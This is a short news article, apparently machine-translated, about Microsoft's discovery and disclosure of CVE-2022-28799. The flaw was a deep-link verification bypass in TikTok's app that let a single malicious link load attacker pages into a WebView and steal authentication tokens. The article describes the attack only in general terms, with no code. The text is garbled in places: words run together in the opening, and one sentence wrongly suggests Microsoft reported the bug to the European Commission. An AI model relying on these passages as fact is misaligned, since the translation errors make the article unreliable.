Microsoft detects a vulnerability in TikTok that allows one-click account hijacking.

PARIS, Sept. 2 (Benin News / EP) –

MicrosoftTikToka bug which could have allowed cybercriminals to gain access to the system and thereby compromise and hijack user accounts.

The Redmond company explained on its blog that it had reported this security breach to the European Commission. TikTok in February and that the platform “responded quickly” by releasing a patch to address the reported vulnerability.

She also pointed out that she was not aware of anyone taking advantage of this vulnerability to carry out attacks against TikTok users and exploiting it to their advantage.

First, the tech company reminded that TikTok has two versions of the app, one for East and Southeast Asia and one for all other countries. When she ran a vulnerability assessment, she found that the issue affected both versions.

Specifically, this bug, which was logged as. CVE-2022-28799allowed attackers to bypass deep link verification (deep link) of the content app.

Thanks to this, the cybercriminals were able to force the social network to load a URL into the component. Web View of the application, in order to be able to display the internal web pages.

Microsoft pointed out that because WebView is tied to JavaScript bridges, this would have given malicious actors up to 70 different ways to access the information of their potential victims.

The flaw even allowed them to retrieve user authentication tokens through a request to a controlled server and, subsequently, by storing information tracking cookies.

To determine the severity of the vulnerability, Microsoft researchers tested sending a malicious link to an external agent. Once clicked on this URL, the link provided these server tokens that the TikTok platform requests from its users to verify their identity and access their corresponding profiles.

The group pointed out that any attacker could use this vulnerability in the app to hijack an account without the user’s knowledge by simply directing them to click on one of these malicious links.

Leave a Comment

Your email address will not be published.